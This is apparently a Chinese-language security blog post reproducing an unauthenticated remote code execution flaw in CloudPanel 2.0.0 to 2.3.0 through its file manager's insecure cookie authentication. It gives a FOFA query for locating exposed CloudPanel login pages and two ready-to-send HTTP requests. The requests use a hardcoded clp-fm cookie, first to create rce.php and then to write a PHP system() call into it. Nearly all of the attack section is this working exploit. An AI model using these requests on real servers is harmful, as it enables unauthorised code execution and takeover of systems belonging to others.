Babing
Published on 2024-08-30 / 2 Visits
0
0

C5-1CloudPanel-RCE

C5-1CloudPanel-RCE

漏洞描述:

由于2.3.1 之前的 CloudPanel 具有不安全的文件管理器 cookie 身份验证。未经身份验证的攻击者可以利用此问题在服务器上创建任意文件,创建PHP后门文件可远程代码执行,并且获取服务器权限。

影响版本:

CloudPanel >= v2.0.0 && <= v2.3.0

网站图片:

image-20240620200425229

网络测绘:

fofa语法:

FOFA:title==“CloudPanel | Log In”

漏洞复现:

创建文件
payload:

POST /file-manager/backend/makefile HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Type: application/x-www-form-urlencoded

id=/htdocs/app/files/public/&name=rce.php

效果图:

写入文件内容

POST /file-manager/backend/text HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Type: application/x-www-form-urlencoded

id=/htdocs/app/files/public/rce.php&content=<?php system('uname -a');?>


RCE


Comment